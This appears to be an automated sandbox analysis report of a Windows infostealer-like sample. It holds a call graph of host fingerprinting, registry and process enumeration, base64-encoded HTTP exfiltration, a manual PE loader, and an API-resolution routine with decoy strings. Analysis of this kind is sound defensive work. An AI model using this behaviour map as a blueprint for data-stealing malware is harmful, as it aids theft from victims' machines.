931d8e 14689->14690 14691 93a9b0 4 API calls 14690->14691 14692 931d9e 14691->14692 14693 93a8a0 lstrcpy 14692->14693 14694 931da7 14693->14694 14695 93a9b0 4 API calls 14694->14695 14696 931dc6 14695->14696 14697 93a8a0 lstrcpy 14696->14697 14698 931dcf 14697->14698 14699 93a9b0 4 API calls 14698->14699 14700 931df0 14699->14700 14701 93a8a0 lstrcpy 14700->14701 14702 931df9 14701->14702 15361 937980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14702->15361 14705 93a9b0 4 API calls 14706 931e19 14705->14706 14707 93a8a0 lstrcpy 14706->14707 14708 931e22 14707->14708 14709 93a9b0 4 API calls 14708->14709 14710 931e41 14709->14710 14711 93a8a0 lstrcpy 14710->14711 14712 931e4a 14711->14712 14713 93a9b0 4 API calls 14712->14713 14714 931e6b 14713->14714 14715 93a8a0 lstrcpy 14714->14715 14716 931e74 14715->14716 15363 937a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14716->15363 14719 93a9b0 4 API calls 14720 931e94 14719->14720 14721 93a8a0 lstrcpy 14720->14721 14722 931e9d 14721->14722 14723 93a9b0 4 API calls 14722->14723 14724 931ebc 14723->14724 14725 93a8a0 lstrcpy 14724->14725 14726 931ec5 14725->14726 14727 93a9b0 4 API calls 14726->14727 14728 931ee5 14727->14728 14729 93a8a0 lstrcpy 14728->14729 14730 931eee 14729->14730 15366 937b00 GetUserDefaultLocaleName 14730->15366 14733 93a9b0 4 API calls 14734 931f0e 14733->14734 14735 93a8a0 lstrcpy 14734->14735 14736 931f17 14735->14736 14737 93a9b0 4 API calls 14736->14737 14738 931f36 14737->14738 14739 93a8a0 lstrcpy 14738->14739 14740 931f3f 14739->14740 14741 93a9b0 4 API calls 14740->14741 14742 931f60 14741->14742 14743 93a8a0 lstrcpy 14742->14743 14744 931f69 14743->14744 15370 937b90 14744->15370 14746 931f80 14747 93a920 3 API calls 14746->14747 14748 931f93 14747->14748 14749 93a8a0 lstrcpy 14748->14749 14750 931f9c 14749->14750 14751 93a9b0 4 API calls 14750->14751 14752 931fc6 14751->14752 14753 93a8a0 lstrcpy 14752->14753 14754 931fcf 14753->14754 14755 93a9b0 4 API calls 14754->14755 14756 931fef 14755->14756 14757 93a8a0 lstrcpy 14756->14757 14758 931ff8 14757->14758 15382 937d80 GetSystemPowerStatus 14758->15382 14761 93a9b0 4 API calls 14762 932018 14761->14762 14763 93a8a0 lstrcpy 14762->14763 14764 932021 14763->14764 14765 93a9b0 4 API calls 14764->14765 14766 932040 14765->14766 14767 93a8a0 lstrcpy 14766->14767 14768 932049 14767->14768 14769 93a9b0 4 API calls 14768->14769 14770 93206a 14769->14770 14771 93a8a0 lstrcpy 14770->14771 14772 932073 14771->14772 14773 93207e GetCurrentProcessId 14772->14773 15384 939470 OpenProcess 14773->15384 14776 93a920 3 API calls 14777 9320a4 14776->14777 14778 93a8a0 lstrcpy 14777->14778 14779 9320ad 14778->14779 14780 93a9b0 4 API calls 14779->14780 14781 9320d7 14780->14781 14782 93a8a0 lstrcpy 14781->14782 14783 9320e0 14782->14783 14784 93a9b0 4 API calls 14783->14784 14785 932100 14784->14785 14786 93a8a0 lstrcpy 14785->14786 14787 932109 14786->14787 15389 937e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14787->15389 14790 93a9b0 4 API calls 14791 932129 14790->14791 14792 93a8a0 lstrcpy 14791->14792 14793 932132 14792->14793 14794 93a9b0 4 API calls 14793->14794 14795 932151 14794->14795 14796 93a8a0 lstrcpy 14795->14796 14797 93215a 14796->14797 14798 93a9b0 4 API calls 14797->14798 14799 93217b 14798->14799 14800 93a8a0 lstrcpy 14799->14800 14801 932184 14800->14801 15393 937f60 14801->15393 14804 93a9b0 4 API calls 14805 9321a4 14804->14805 14806 93a8a0 lstrcpy 14805->14806 14807 9321ad 14806->14807 14808 93a9b0 4 API calls 14807->14808 14809 9321cc 14808->14809 14810 93a8a0 lstrcpy 14809->14810 14811 9321d5 14810->14811 14812 93a9b0 4 API calls 14811->14812 14813 9321f6 14812->14813 14814 93a8a0 lstrcpy 14813->14814 14815 9321ff 14814->14815 15406 937ed0 GetSystemInfo wsprintfA 14815->15406 14818 93a9b0 4 API calls 14819 93221f 14818->14819 14820 93a8a0 lstrcpy 14819->14820 14821 932228 14820->14821 14822 93a9b0 4 API calls 14821->14822 14823 932247 14822->14823 14824 93a8a0 lstrcpy 14823->14824 14825 932250 14824->14825 14826 93a9b0 4 API calls 14825->14826 14827 932270 14826->14827 14828 93a8a0 lstrcpy 14827->14828 14829 932279 14828->14829 15408 938100 GetProcessHeap RtlAllocateHeap 14829->15408 14832 93a9b0 4 API calls 14833 932299 14832->14833 14834 93a8a0 lstrcpy 14833->14834 14835 9322a2 14834->14835 14836 93a9b0 4 API calls 14835->14836 14837 9322c1 14836->14837 14838 93a8a0 lstrcpy 14837->14838 14839 9322ca 14838->14839 14840 93a9b0 4 API calls 14839->14840 14841 9322eb 14840->14841 14842 93a8a0 lstrcpy 14841->14842 14843 9322f4 14842->14843 15414 9387c0 14843->15414 14846 93a920 3 API calls 14847 93231e 14846->14847 14848 93a8a0 lstrcpy 14847->14848 14849 932327 14848->14849 14850 93a9b0 4 API calls 14849->14850 14851 932351 14850->14851 14852 93a8a0 lstrcpy 14851->14852 14853 93235a 14852->14853 14854 93a9b0 4 API calls 14853->14854 14855 93237a 14854->14855 14856 93a8a0 lstrcpy 14855->14856 14857 932383 14856->14857 14858 93a9b0 4 API calls 14857->14858 14859 9323a2 14858->14859 14860 93a8a0 lstrcpy 14859->14860 14861 9323ab 14860->14861 15419 9381f0 14861->15419 14863 9323c2 14864 93a920 3 API calls 14863->14864 14865 9323d5 14864->14865 14866 93a8a0 lstrcpy 14865->14866 14867 9323de 14866->14867 14868 93a9b0 4 API calls 14867->14868 14869 93240a 14868->14869 14870 93a8a0 lstrcpy 14869->14870 14871 932413 14870->14871 14872 93a9b0 4 API calls 14871->14872 14873 932432 14872->14873 14874 93a8a0 lstrcpy 14873->14874 14875 93243b 14874->14875 14876 93a9b0 4 API calls 14875->14876 14877 93245c 14876->14877 14878 93a8a0 lstrcpy 14877->14878 14879 932465 14878->14879 14880 93a9b0 4 API calls 14879->14880 14881 932484 14880->14881 14882 93a8a0 lstrcpy 14881->14882 14883 93248d 14882->14883 14884 93a9b0 4 API calls 14883->14884 14885 9324ae 14884->14885 14886 93a8a0 lstrcpy 14885->14886 14887 9324b7 14886->14887 15427 938320 14887->15427 14889 9324d3 14890 93a920 3 API calls 14889->14890 14891 9324e6 14890->14891 14892 93a8a0 lstrcpy 14891->14892 14893 9324ef 14892->14893 14894 93a9b0 4 API calls 14893->14894 14895 932519 14894->14895 14896 93a8a0 lstrcpy 14895->14896 14897 932522 14896->14897 14898 93a9b0 4 API calls 14897->14898 14899 932543 14898->14899 14900 93a8a0 lstrcpy 14899->14900 14901 93254c 14900->14901 14902 938320 17 API calls 14901->14902 14903 932568 14902->14903 14904 93a920 3 API calls 14903->14904 14905 93257b 14904->14905 14906 93a8a0 lstrcpy 14905->14906 14907 932584 14906->14907 14908 93a9b0 4 API calls 14907->14908 14909 9325ae 14908->14909 14910 93a8a0 lstrcpy 14909->14910 14911 9325b7 14910->14911 14912 93a9b0 4 API calls 14911->14912 14913 9325d6 14912->14913 14914 93a8a0 lstrcpy 14913->14914 14915 9325df 14914->14915 14916 93a9b0 4 API calls 14915->14916 14917 932600 14916->14917 14918 93a8a0 lstrcpy 14917->14918 14919 932609 14918->14919 15463 938680 14919->15463 14921 932620 14922 93a920 3 API calls 14921->14922 14923 932633 14922->14923 14924 93a8a0 lstrcpy 14923->14924 14925 93263c 14924->14925 14926 93265a lstrlen 14925->14926 14927 93266a 14926->14927 14928 93a740 lstrcpy 14927->14928 14929 93267c 14928->14929 14930 921590 lstrcpy 14929->14930 14931 93268d 14930->14931 15473 935190 14931->15473 14933 932699 14933->13365 15661 93aad0 14934->15661 14936 925009 InternetOpenUrlA 14940 925021 14936->14940 14937 9250a0 InternetCloseHandle InternetCloseHandle 14939 9250ec 14937->14939 14938 92502a InternetReadFile 14938->14940 14939->13369 14940->14937 14940->14938 15662 9298d0 14941->15662 14943 930759 14944 930a38 14943->14944 14946 93077d 14943->14946 14945 921590 lstrcpy 14944->14945 14947 930a49 14945->14947 14948 930799 StrCmpCA 14946->14948 15838 930250 14947->15838 14950 930843 14948->14950 14951 9307a8 14948->14951 14954 930865 StrCmpCA 14950->14954 14953 93a7a0 lstrcpy 14951->14953 14955 9307c3 14953->14955 14957 930874 14954->14957 14993 93096b 14954->14993 14956 921590 lstrcpy 14955->14956 14958 93080c 14956->14958 14959 93a740 lstrcpy 14957->14959 14960 93a7a0 lstrcpy 14958->14960 14962 930881 14959->14962 14963 930823 14960->14963 14961 93099c StrCmpCA 14964 930a2d 14961->14964 14965 9309ab 14961->14965 14966 93a9b0 4 API calls 14962->14966 14967 93a7a0 lstrcpy 14963->14967 14964->13373 14968 921590 lstrcpy 14965->14968 14969 9308ac 14966->14969 14971 93083e 14967->14971 14972 9309f4 14968->14972 14970 93a920 3 API calls 14969->14970 14973 9308b3 14970->14973 15665 92fb00 14971->15665 14975 93a7a0 lstrcpy 14972->14975 14977 93a9b0 4 API calls 14973->14977 14976 930a0d 14975->14976 14978 93a7a0 lstrcpy 14976->14978 14979 9308ba 14977->14979 14980 930a28 14978->14980 14981 93a8a0 lstrcpy 14979->14981 14993->14961 15313 93a7a0 lstrcpy 15312->15313 15314 921683 15313->15314 15315 93a7a0 lstrcpy 15314->15315 15316 921695 15315->15316 15317 93a7a0 lstrcpy 15316->15317 15318 9216a7 15317->15318 15319 93a7a0 lstrcpy 15318->15319 15320 9215a3 15319->15320 15320->14196 15322 9247c6 15321->15322 15323 924838 lstrlen 15322->15323 15347 93aad0 15323->15347 15325 924848 InternetCrackUrlA 15326 924867 15325->15326 15326->14273 15328 93a740 lstrcpy 15327->15328 15329 938b74 15328->15329 15330 93a740 lstrcpy 15329->15330 15331 938b82 GetSystemTime 15330->15331 15333 938b99 15331->15333 15332 93a7a0 lstrcpy 15334 938bfc 15332->15334 15333->15332 15334->14288 15336 93a931 15335->15336 15337 93a988 15336->15337 15339 93a968 lstrcpy lstrcat 15336->15339 15338 93a7a0 lstrcpy 15337->15338 15340 93a994 15338->15340 15339->15337 15340->14291 15341->14406 15343 924eee 15342->15343 15344 929af9 LocalAlloc 15342->15344 15343->14294 15343->14296 15344->15343 15345 929b14 CryptStringToBinaryA 15344->15345 15345->15343 15346 929b39 LocalFree 15345->15346 15346->15343 15347->15325 15348->14416 15349->14557 15350->14559 15351->14567 15480 9377a0 15352->15480 15355 9376c6 RegOpenKeyExA 15357 9376e7 RegQueryValueExA 15355->15357 15358 937704 RegCloseKey 15355->15358 15356 931c1e 15356->14649 15357->15358 15358->15356 15360 931c99 15359->15360 15360->14663 15362 931e09 15361->15362 15362->14705 15364 931e84 15363->15364 15365 937a9a wsprintfA 15363->15365 15364->14719 15365->15364 15367 931efe 15366->15367 15368 937b4d 15366->15368 15367->14733 15487 938d20 LocalAlloc CharToOemW 15368->15487 15371 93a740 lstrcpy 15370->15371 15372 937bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15371->15372 15381 937c25 15372->15381 15373 937c46 GetLocaleInfoA 15373->15381 15374 937d18 15375 937d28 15374->15375 15376 937d1e LocalFree 15374->15376 15378 93a7a0 lstrcpy 15375->15378 15376->15375 15377 93a9b0 lstrcpy lstrlen lstrcpy lstrcat 15377->15381 15380 937d37 15378->15380 15379 93a8a0 lstrcpy 15379->15381 15380->14746 15381->15373 15381->15374 15381->15377 15381->15379 15383 932008 15382->15383 15383->14761 15385 939493 GetModuleFileNameExA CloseHandle 15384->15385 15386 9394b5 15384->15386 15385->15386 15387 93a740 lstrcpy 15386->15387 15388 932091 15387->15388 15388->14776 15390 932119 15389->15390 15391 937e68 RegQueryValueExA 15389->15391 15390->14790 15392 937e8e RegCloseKey 15391->15392 15392->15390 15394 937fb9 GetLogicalProcessorInformationEx 15393->15394 15395 937fd8 GetLastError 15394->15395 15399 938029 15394->15399 15401 937fe3 15395->15401 15404 938022 15395->15404 15398 9389f0 2 API calls 15402 932194 15398->15402 15400 9389f0 2 API calls 15399->15400 15403 93807b 15400->15403 15401->15394 15401->15402 15488 9389f0 15401->15488 15491 938a10 GetProcessHeap RtlAllocateHeap 15401->15491 15402->14804 15403->15404 15405 938084 wsprintfA 15403->15405 15404->15398 15404->15402 15405->15402 15407 93220f 15406->15407 15407->14818 15409 9389b0 15408->15409 15410 93814d GlobalMemoryStatusEx 15409->15410 15413 938163 __aulldiv 15410->15413 15411 93819b wsprintfA 15412 932289 15411->15412 15412->14832 15413->15411 15415 9387fb GetProcessHeap RtlAllocateHeap wsprintfA 15414->15415 15417 93a740 lstrcpy 15415->15417 15418 93230b 15417->15418 15418->14846 15420 93a740 lstrcpy 15419->15420 15422 938229 15420->15422 15421 938263 15424 93a7a0 lstrcpy 15421->15424 15422->15421 15423 93a9b0 lstrcpy lstrlen lstrcpy lstrcat 15422->15423 15426 93a8a0 lstrcpy 15422->15426 15423->15422 15425 9382dc 15424->15425 15425->14863 15426->15422 15428 93a740 lstrcpy 15427->15428 15429 93835c RegOpenKeyExA 15428->15429 15430 9383d0 15429->15430 15431 9383ae 15429->15431 15433 938613 RegCloseKey 15430->15433 15434 9383f8 RegEnumKeyExA 15430->15434 15432 93a7a0 lstrcpy 15431->15432 15443 9383bd 15432->15443 15435 93a7a0 lstrcpy 15433->15435 15436 93843f wsprintfA RegOpenKeyExA 15434->15436 15437 93860e 15434->15437 15435->15443 15438 9384c1 RegQueryValueExA 15436->15438 15439 938485 RegCloseKey RegCloseKey 15436->15439 15437->15433 15441 938601 RegCloseKey 15438->15441 15442 9384fa lstrlen 15438->15442 15440 93a7a0 lstrcpy 15439->15440 15440->15443 15441->15437 15442->15441 15444 938510 15442->15444 15443->14889 15445 93a9b0 4 API calls 15444->15445 15446 938527 15445->15446 15447 93a8a0 lstrcpy 15446->15447 15448 938533 15447->15448 15449 93a9b0 4 API calls 15448->15449 15450 938557 15449->15450 15451 93a8a0 lstrcpy 15450->15451 15452 938563 15451->15452 15453 93856e RegQueryValueExA 15452->15453 15453->15441 15454 9385a3 15453->15454 15455 93a9b0 4 API calls 15454->15455 15456 9385ba 15455->15456 15457 93a8a0 lstrcpy 15456->15457 15458 9385c6 15457->15458 15459 93a9b0 4 API calls 15458->15459 15460 9385ea 15459->15460 15461 93a8a0 lstrcpy 15460->15461 15462 9385f6 15461->15462 15462->15441 15464 93a740 lstrcpy 15463->15464 15465 9386bc CreateToolhelp32Snapshot Process32First 15464->15465 15466 9386e8 Process32Next 15465->15466 15467 93875d CloseHandle 15465->15467 15466->15467 15470 9386fd 15466->15470 15468 93a7a0 lstrcpy 15467->15468 15471 938776 15468->15471 15469 93a9b0 lstrcpy lstrlen lstrcpy lstrcat 15469->15470 15470->15466 15470->15469 15472 93a8a0 lstrcpy 15470->15472 15471->14921 15472->15470 15474 93a7a0 lstrcpy 15473->15474 15475 9351b5 15474->15475 15476 921590 lstrcpy 15475->15476 15477 9351c6 15476->15477 15492 925100 15477->15492 15479 9351cf 15479->14933 15483 937720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15480->15483 15482 9376b9 15482->15355 15482->15356 15484 937780 RegCloseKey 15483->15484 15485 937765 RegQueryValueExA 15483->15485 15486 937793 15484->15486 15485->15484 15486->15482 15487->15367 15489 9389f9 GetProcessHeap HeapFree 15488->15489 15490 938a0c 15488->15490 15489->15490 15490->15401 15491->15401 15493 93a7a0 lstrcpy 15492->15493 15494 925119 15493->15494 15495 9247b0 2 API calls 15494->15495 15496 925125 15495->15496 15652 938ea0 15496->15652 15498 925184 15499 925192 lstrlen 15498->15499 15500 9251a5 15499->15500 15501 938ea0 4 API calls 15500->15501 15502 9251b6 15501->15502 15503 93a740 lstrcpy 15502->15503 15504 9251c9 15503->15504 15505 93a740 lstrcpy 15504->15505 15506 9251d6 15505->15506 15507 93a740 lstrcpy 15506->15507 15508 9251e3 15507->15508 15509 93a740 lstrcpy 15508->15509 15510 9251f0 15509->15510 15511 93a740 lstrcpy 15510->15511 15512 9251fd InternetOpenA StrCmpCA 15511->15512 15513 92522f 15512->15513 15514 9258c4 InternetCloseHandle 15513->15514 15515 938b60 3 API calls 15513->15515 15521 9258d9 codecvt 15514->15521 15516 92524e 15515->15516 15517 93a920 3 API calls 15516->15517 15518 925261 15517->15518 15519 93a8a0 lstrcpy 15518->15519 15520 92526a 15519->15520 15522 93a9b0 4 API calls 15520->15522 15524 93a7a0 lstrcpy 15521->15524 15523 9252ab 15522->15523 15525 93a920 3 API calls 15523->15525 15533 925913 15524->15533 15526 9252b2 15525->15526 15527 93a9b0 4 API calls 15526->15527 15528 9252b9 15527->15528 15529 93a8a0 lstrcpy 15528->15529 15530 9252c2 15529->15530 15531 93a9b0 4 API calls 15530->15531 15532 925303 15531->15532 15534 93a920 3 API calls 15532->15534 15533->15479 15535 92530a 15534->15535 15536 93a8a0 lstrcpy 15535->15536 15537 925313 15536->15537 15538 925329 InternetConnectA 15537->15538 15538->15514 15539 925359 HttpOpenRequestA 15538->15539 15541 9258b7 InternetCloseHandle 15539->15541 15542 9253b7 15539->15542 15541->15514 15543 93a9b0 4 API calls 15542->15543 15544 9253cb 15543->15544 15545 93a8a0 lstrcpy 15544->15545 15546 9253d4 15545->15546 15547 93a920 3 API calls 15546->15547 15548 9253f2 15547->15548 15549 93a8a0 lstrcpy 15548->15549 15550 9253fb 15549->15550 15551 93a9b0 4 API calls 15550->15551 15552 92541a 15551->15552 15553 93a8a0 lstrcpy 15552->15553 15554 925423 15553->15554 15555 93a9b0 4 API calls 15554->15555 15556 925444 15555->15556 15557 93a8a0 lstrcpy 15556->15557 15558 92544d 15557->15558 15559 93a9b0 4 API calls 15558->15559 15560 92546e 15559->15560 15653 938ead CryptBinaryToStringA 15652->15653 15657 938ea9 15652->15657 15654 938ece GetProcessHeap RtlAllocateHeap 15653->15654 15653->15657 15655 938ef4 codecvt 15654->15655 15654->15657 15656 938f05 CryptBinaryToStringA 15655->15656 15656->15657 15657->15498 15661->14936 15904 929880 15662->15904 15664 9298e1 15664->14943 15666 93a740 lstrcpy 15665->15666 15667 92fb16 15666->15667 15839 93a740 lstrcpy 15838->15839 15840 930266 15839->15840 15841 938de0 2 API calls 15840->15841 15842 93027b 15841->15842 15843 93a920 3 API calls 15842->15843 15844 93028b 15843->15844 15845 93a8a0 lstrcpy 15844->15845 15846 930294 15845->15846 15847 93a9b0 4 API calls 15846->15847 15905 92988e 15904->15905 15908 926fb0 15905->15908 15907 9298ad codecvt 15907->15664 15911 926d40 15908->15911 15912 926d63 15911->15912 15926 926d59 15911->15926 15927 926530 15912->15927 15916 926dbe 15916->15926 15937 9269b0 15916->15937 15918 926e2a 15919 926ee6 VirtualFree 15918->15919 15921 926ef7 15918->15921 15918->15926 15919->15921 15920 926f41 15922 9389f0 2 API calls 15920->15922 15920->15926 15921->15920 15923 926f26 FreeLibrary 15921->15923 15924 926f38 15921->15924 15922->15926 15923->15921 15925 9389f0 2 API calls 15924->15925 15925->15920 15926->15907 15928 926542 15927->15928 15930 926549 15928->15930 15947 938a10 GetProcessHeap RtlAllocateHeap 15928->15947 15930->15926 15931 926660 15930->15931 15936 92668f VirtualAlloc 15931->15936 15933 926730 15934 926743 VirtualAlloc 15933->15934 15935 92673c 15933->15935 15934->15935 15935->15916 15936->15933 15936->15935 15938 9269d5 15937->15938 15939 9269c9 15937->15939 15938->15918 15939->15938 15940 926a09 LoadLibraryA 15939->15940 15940->15938 15941 926a32 15940->15941 15944 926ae0 15941->15944 15948 938a10 GetProcessHeap RtlAllocateHeap 15941->15948 15943 926ba8 GetProcAddress 15943->15938 15943->15944 15944->15938 15944->15943 15945 9389f0 2 API calls 15945->15944 15946 926a8b 15946->15938 15946->15945 15947->15930 15948->15946

                  Executed Functions

                  Function 00939860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 939860-939874 call 939750 663 939a93-939af2 LoadLibraryA * 5 660->663 664 93987a-939a8e call 939780 GetProcAddress * 21 660->664 666 939af4-939b08 GetProcAddress 663->666 667 939b0d-939b14 663->667 664->663 666->667 668 939b46-939b4d 667->668 669 939b16-939b41 GetProcAddress * 2 667->669 671 939b68-939b6f 668->671 672 939b4f-939b63 GetProcAddress 668->672 669->668 673 939b71-939b84 GetProcAddress 671->673 674 939b89-939b90 671->674 672->671 673->674 675 939b92-939bbc GetProcAddress * 2 674->675 676 939bc1-939bc2 674->676 675->676
                  APIs
                  • GetProcAddress.KERNEL32(76F70000,010541F8), ref: 009398A1
                  • GetProcAddress.KERNEL32(76F70000,01054228), ref: 009398BA
                  • GetProcAddress.KERNEL32(76F70000,01054258), ref: 009398D2
                  • GetProcAddress.KERNEL32(76F70000,01054150), ref: 009398EA
                  • GetProcAddress.KERNEL32(76F70000,010540D8), ref: 00939903
                  • GetProcAddress.KERNEL32(76F70000,01058E10), ref: 0093991B
                  • GetProcAddress.KERNEL32(76F70000,01046260), ref: 00939933
                  • GetProcAddress.KERNEL32(76F70000,010461E0), ref: 0093994C
                  • GetProcAddress.KERNEL32(76F70000,01054198), ref: 00939964
                  • GetProcAddress.KERNEL32(76F70000,010540C0), ref: 0093997C
                  • GetProcAddress.KERNEL32(76F70000,01054168), ref: 00939995
                  • GetProcAddress.KERNEL32(76F70000,01054180), ref: 009399AD
                  • GetProcAddress.KERNEL32(76F70000,01046360), ref: 009399C5
                  • GetProcAddress.KERNEL32(76F70000,010541B0), ref: 009399DE
                  • GetProcAddress.KERNEL32(76F70000,01059228), ref: 009399F6
                  • GetProcAddress.KERNEL32(76F70000,01046460), ref: 00939A0E
                  • GetProcAddress.KERNEL32(76F70000,01059360), ref: 00939A27
                  • GetProcAddress.KERNEL32(76F70000,01059378), ref: 00939A3F
                  • GetProcAddress.KERNEL32(76F70000,01046400), ref: 00939A57
                  • GetProcAddress.KERNEL32(76F70000,01059240), ref: 00939A70
                  • GetProcAddress.KERNEL32(76F70000,01046520), ref: 00939A88
                  • LoadLibraryA.KERNEL32(01059210,?,00936A00), ref: 00939A9A
                  • LoadLibraryA.KERNEL32(01059258,?,00936A00), ref: 00939AAB
                  • LoadLibraryA.KERNEL32(010591B0,?,00936A00), ref: 00939ABD
                  • LoadLibraryA.KERNEL32(01059270,?,00936A00), ref: 00939ACF
                  • LoadLibraryA.KERNEL32(010591C8,?,00936A00), ref: 00939AE0
                  • GetProcAddress.KERNEL32(76DA0000,01059288), ref: 00939B02
                  • GetProcAddress.KERNEL32(75840000,010591E0), ref: 00939B23
                  • GetProcAddress.KERNEL32(75840000,010592A0), ref: 00939B3B
                  • GetProcAddress.KERNEL32(753A0000,01059330), ref: 00939B5D
                  • GetProcAddress.KERNEL32(77300000,01046500), ref: 00939B7E
                  • GetProcAddress.KERNEL32(774D0000,01058DB0), ref: 00939B9F
                  • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 00939BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00939BAA
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: e43167228c2de61e1f43585264dccaaef8567aae87a66508368ad6d6ab87d2c2
                  • Instruction ID: 9c4764b9235f323e7f3ea578ca8725097add8e93c36c325dc4ec05006c9d8627
                  • Opcode Fuzzy Hash: e43167228c2de61e1f43585264dccaaef8567aae87a66508368ad6d6ab87d2c2
                  • Instruction Fuzzy Hash: 52A13CB55012409FDB44EFA8EE98A6637F9F78C301704451AE609E32E4DEBDA841DF63
                  Function 009245C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 9245c0-924695 RtlAllocateHeap 781 9246a0-9246a6 764->781 782 92474f-9247a9 VirtualProtect 781->782 783 9246ac-92474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0092460E
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0092479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009246AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009245E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009245C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009246D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009246C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009246B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009245F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009246CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009245D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092462D
